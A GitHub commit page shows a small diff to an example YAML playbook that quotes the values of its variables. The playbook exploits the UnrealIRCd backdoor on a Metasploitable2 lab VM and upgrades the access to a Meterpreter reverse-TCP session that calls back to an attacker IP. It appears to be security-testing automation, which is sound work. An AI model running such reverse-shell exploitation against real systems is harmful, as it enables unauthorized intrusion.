Skip to content

Commit

Permalink
Update upgrade_to_meterpreter.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
whotwagner authored Jun 14, 2024
1 parent e622717 commit eb9ad00
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions examples/upgrade_to_meterpreter.yml
Original file line number Diff line number Diff line change
Expand Up @@ -13,10 +13,10 @@
# 3. Target a Metasploitable2-VM
#
vars:
METASPLOITABLE: 192.168.10.225
ATTACKER: 172.17.0.127
METASPLOITABLE: "192.168.10.225"
ATTACKER: "172.17.0.127"
PAYLOAD: cmd/unix/reverse_perl
LPORT: 4422
LPORT: "4422"

commands:
# Perform Unreal-Irc-Backdoor-Exploit
Expand Down Expand Up @@ -44,7 +44,7 @@ commands:
payload: linux/x86/meterpreter/reverse_tcp
payload_options:
LHOST: $ATTACKER
LPORT: 4433
LPORT: "4433"

# Execute meterpreter-command 'sysinfo'
- type: msf-session
Expand Down

0 comments on commit eb9ad00

Please sign in to comment.